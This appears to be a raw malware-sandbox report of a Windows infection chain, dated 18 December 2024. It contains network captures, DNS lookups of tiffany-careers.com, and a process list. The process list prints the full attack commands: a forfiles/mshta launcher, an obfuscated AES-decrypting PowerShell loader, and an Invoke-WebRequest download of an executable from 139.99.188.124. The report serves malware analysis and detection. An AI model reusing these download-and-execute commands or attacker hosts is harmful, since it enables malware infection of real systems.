                                                                    Dec 18, 2024 09:13:22.402625084 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.403345108 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.403481960 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.403539896 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.404249907 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.404356956 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.404414892 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.405076027 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.405200005 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.405253887 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.405942917 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.406070948 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.406121016 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.406833887 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.406944036 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.407737970 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.407814026 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.407871008 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.408545971 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.408670902 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.408721924 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.409429073 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.409540892 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.409590960 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.410310984 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.410422087 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.411151886 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.411221981 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.411258936 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.412013054 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.412058115 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.412178040 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.412894964 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.412940025 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.412986994 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.413786888 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.413829088 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.559526920 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.559567928 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.559881926 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.559945107 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.559961081 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.560327053 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.560762882 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.560915947 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.561589003 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.561745882 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.561800003 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.562474012 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.562597036 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.563329935 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.563381910 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.563510895 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.564214945 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.564263105 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.564336061 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.565078974 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.565123081 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.565181971 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.565745115 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.565933943 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.566054106 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.566098928 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.566787958 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.566869974 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.567670107 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.567717075 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.567760944 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.568367004 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.568533897 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.568654060 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.569403887 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.569504976 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.569549084 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.570295095 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.570394993 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.570467949 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.571141005 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.571228027 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.571306944 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.572015047 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.572194099 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.572248936 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.572871923 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.572988987 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.573035955 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.573829889 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.573961973 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.574140072 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.574618101 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.574682951 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.574886084 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.575565100 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.575579882 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.575660944 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.576356888 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.576443911 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.576488018 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.577307940 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.577441931 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.577486038 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.578141928 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.578214884 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.946027994 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.948056936 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.948072910 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.948088884 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.948105097 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.948144913 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.948170900 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.948364973 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.948527098 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.948576927 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.949136019 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.949301004 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.949352980 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.950052023 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.950397968 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.950463057 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.950588942 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.950604916 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.950639009 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.951807022 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.952003956 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.952107906 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.952756882 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.952922106 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.952965975 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.953536034 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.953725100 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.954354048 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.954406023 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.954502106 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.954561949 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.955198050 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:23.010148048 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:23.238533020 CET4972980192.168.2.5139.99.188.124
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Dec 18, 2024 09:12:58.418391943 CET | 54917 | 53 | 192.168.2.5 | 1.1.1.1 |
| Dec 18, 2024 09:12:58.758760929 CET | 53 | 54917 | 1.1.1.1 | 192.168.2.5 |
| Dec 18, 2024 09:13:14.625849962 CET | 65149 | 53 | 192.168.2.5 | 1.1.1.1 |
| Dec 18, 2024 09:13:25.447237968 CET | 50882 | 53 | 192.168.2.5 | 1.1.1.1 |
| Dec 18, 2024 09:13:25.674781084 CET | 53 | 50882 | 1.1.1.1 | 192.168.2.5 |
| Dec 18, 2024 09:13:41.787744045 CET | 60982 | 53 | 192.168.2.5 | 1.1.1.1 |
| Dec 18, 2024 09:13:41.925384045 CET | 53 | 60982 | 1.1.1.1 | 192.168.2.5 |

| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Dec 18, 2024 09:12:58.418391943 CET | 192.168.2.5 | 1.1.1.1 | 0x1670 | Standard query (0) | tiffany-careers.com | A (IP address) | IN (0x0001) | false |
| Dec 18, 2024 09:13:14.625849962 CET | 192.168.2.5 | 1.1.1.1 | 0xf3f8 | Standard query (0) | x1.i.lencr.org | A (IP address) | IN (0x0001) | false |
| Dec 18, 2024 09:13:25.447237968 CET | 192.168.2.5 | 1.1.1.1 | 0x5207 | Standard query (0) | nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | A (IP address) | IN (0x0001) | false |
| Dec 18, 2024 09:13:41.787744045 CET | 192.168.2.5 | 1.1.1.1 | 0xd9f7 | Standard query (0) | nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | A (IP address) | IN (0x0001) | false |

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Dec 18, 2024 09:12:58.758760929 CET | 1.1.1.1 | 192.168.2.5 | 0x1670 | No error (0) | tiffany-careers.com | | 147.45.49.155 | A (IP address) | IN (0x0001) | false |
| Dec 18, 2024 09:13:14.859790087 CET | 1.1.1.1 | 192.168.2.5 | 0xf3f8 | No error (0) | x1.i.lencr.org | crl.root-x1.letsencrypt.org.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 18, 2024 09:13:25.674781084 CET | 1.1.1.1 | 192.168.2.5 | 0x5207 | Name error (3) | nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | none | none | A (IP address) | IN (0x0001) | false |
| Dec 18, 2024 09:13:41.925384045 CET | 1.1.1.1 | 192.168.2.5 | 0xd9f7 | Name error (3) | nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | none | none | A (IP address) | IN (0x0001) | false |

• tiffany-careers.com
• 139.99.188.124

| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.5 | 49707 | 147.45.49.155 | 80 | 4308 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |

Timestamp | Bytes transferred | Direction | Data
Dec 18, 2024 09:13:03.447788954 CET | 82 | OUT | GET /Marketing.pdf HTTP/1.1
Host: tiffany-careers.com
Connection: Keep-Alive
Dec 18, 2024 09:13:04.824548006 CET | 1236 | IN | HTTP/1.1 200 OK
etag: "f92-675e8dca-2534b;;;"
last-modified: Sun, 15 Dec 2024 08:05:30 GMT
content-type: application/pdf
content-length: 3986
accept-ranges: bytes
date: Wed, 18 Dec 2024 08:13:04 GMT
server: LiteSpeed
connection: Keep-Alive
Dec 18, 2024 09:13:04.996354103 CET | 58 | OUT | GET /PefjSkkhb.exe HTTP/1.1
Host: tiffany-careers.com
Dec 18, 2024 09:13:05.457967043 CET | 1236 | IN | HTTP/1.1 200 OK
etag: "108a00-675eb102-2534d;;;"
last-modified: Sun, 15 Dec 2024 10:35:46 GMT
content-type: application/x-executable
content-length: 1083904
accept-ranges: bytes
date: Wed, 18 Dec 2024 08:13:05 GMT
server: LiteSpeed
connection: Keep-Alive


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 1 | 192.168.2.5 | 49716 | 139.99.188.124 | 80 | 7812 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |

Timestamp | Bytes transferred | Direction | Data
Dec 18, 2024 09:13:12.417023897 CET | 164 | OUT | GET /kiiMf HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: 139.99.188.124
Connection: Keep-Alive
Dec 18, 2024 09:13:13.875879049 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 08:13:12 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Sun, 15 Dec 2024 10:29:42 GMT
ETag: "da2a8-6294c8abc9816"
Accept-Ranges: bytes
Content-Length: 893608
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 2 | 192.168.2.5 | 49729 | 139.99.188.124 | 80 | 7480 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |

Timestamp | Bytes transferred | Direction | Data
Dec 18, 2024 09:13:19.053615093 CET | 76 | OUT | GET /QWCheljD.txt HTTP/1.1
Host: 139.99.188.124
Connection: Keep-Alive
Dec 18, 2024 09:13:20.553158998 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 08:13:18 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Sun, 15 Dec 2024 10:29:42 GMT
ETag: "12ec22-6294c8abc8478"
Accept-Ranges: bytes
Content-Length: 1240098
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    0 | 192.168.2.5 | 49704 | 147.45.49.155 | 443 | 5060 | C:\Windows\System32\mshta.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    2024-12-18 08:13:00 UTC | 328 | OUT | GET /ghep2 HTTP/1.1
                                                                    Accept: */*
                                                                    Accept-Language: en-CH
                                                                    UA-CPU: AMD64
                                                                    Accept-Encoding: gzip, deflate
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                    Host: tiffany-careers.com
                                                                    Connection: Keep-Alive
                                                                    2024-12-18 08:13:00 UTC | 396 | IN | HTTP/1.1 200 OK
                                                                    etag: "13122-675ebf3f-2534f;;;"
                                                                    last-modified: Sun, 15 Dec 2024 11:36:31 GMT
                                                                    content-length: 78114
                                                                    accept-ranges: bytes
                                                                    date: Wed, 18 Dec 2024 08:13:00 GMT
                                                                    server: LiteSpeed
                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                    connection: close



                                                                    Target ID:0
                                                                    Start time:03:12:54
                                                                    Start date:18/12/2024
                                                                    Path:C:\Windows\System32\forfiles.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\forfiles.exe" /p C:\Windows\System32 /m cmmon32.exe /c "powershell . \*i*\*2\msh*e https://tiffany-careers.com/ghep2
                                                                    Imagebase:0x7ff7b6e20000
                                                                    File size:52'224 bytes
                                                                    MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    Target ID:1
                                                                    Start time:03:12:54
                                                                    Start date:18/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff6d64d0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:2
                                                                    Start time:03:12:54
                                                                    Start date:18/12/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:. \*i*\*2\msh*e https://tiffany-careers.com/ghep2
                                                                    Imagebase:0x7ff7be880000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:4
                                                                    Start time:03:12:56
                                                                    Start date:18/12/2024
                                                                    Path:C:\Windows\System32\mshta.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\mshta.exe" https://tiffany-careers.com/ghep2
                                                                    Imagebase:0x7ff7c7810000
                                                                    File size:14'848 bytes
                                                                    MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    Target ID:5
                                                                    Start time:03:13:00
                                                                    Start date:18/12/2024
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                    Imagebase:0x7ff7e52b0000
                                                                    File size:55'320 bytes
                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:6
                                                                    Start time:03:13:01
                                                                    Start date:18/12/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($RptYb){return -split ($RptYb -replace '..', '0x$& ')};$TmDJyn = clean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uOQabMc = [System.Security.Cryptography.Aes]::Create();$MuOQabMc.Key = clean('756561544973656A645A7544464B6A70');$MuOQabMc.IV = New-Object byte[] 16;$LaiuJGbhf = $MuOQabMc.CreateDecryptor();$mGnVsuDWp = [Text.Encoding]::UTF8.GetString($LaiuJGbhf.TransformFinalBlock($TmDJyn, 0,$TmDJyn.Length)); & $mGnVsuDWp.Substring(0,3) $mGnVsuDWp.Substring(3)
                                                                    Imagebase:0x7ff7be880000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:7
                                                                    Start time:03:13:01
                                                                    Start date:18/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff6d64d0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:8
                                                                    Start time:03:13:03
                                                                    Start date:18/12/2024
                                                                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Marketing.pdf"
                                                                    Imagebase:0x7ff686a00000
                                                                    File size:5'641'176 bytes
                                                                    MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:9
                                                                    Start time:03:13:04
                                                                    Start date:18/12/2024
                                                                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                    Imagebase:0x7ff6413e0000
                                                                    File size:3'581'912 bytes
                                                                    MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:10
                                                                    Start time:03:13:04
                                                                    Start date:18/12/2024
                                                                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1744,i,5196948583256038124,6281931824865784808,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                    Imagebase:0x7ff6413e0000
                                                                    File size:3'581'912 bytes
                                                                    MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:11
                                                                    Start time:03:13:07
                                                                    Start date:18/12/2024
                                                                    Path:C:\Users\user\AppData\Roaming\PefjSkkhb.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user\AppData\Roaming\PefjSkkhb.exe"
                                                                    Imagebase:0x7ff7c0e50000
                                                                    File size:1'083'904 bytes
                                                                    MD5 hash:567DE19C0E7E3A1FC845E51AC1C1D5D8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 32%, ReversingLabs
                                                                    Has exited:true

                                                                    Target ID:12
                                                                    Start time:03:13:07
                                                                    Start date:18/12/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe""
                                                                    Imagebase:0x7ff7be880000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:13
                                                                    Start time:03:13:07
                                                                    Start date:18/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff6d64d0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:18
                                                                    Start time:03:13:15
                                                                    Start date:18/12/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
                                                                    Imagebase:0x7ff7be880000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:19
                                                                    Start time:03:13:15
                                                                    Start date:18/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff6d64d0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:20
                                                                    Start time:03:13:21
                                                                    Start date:18/12/2024
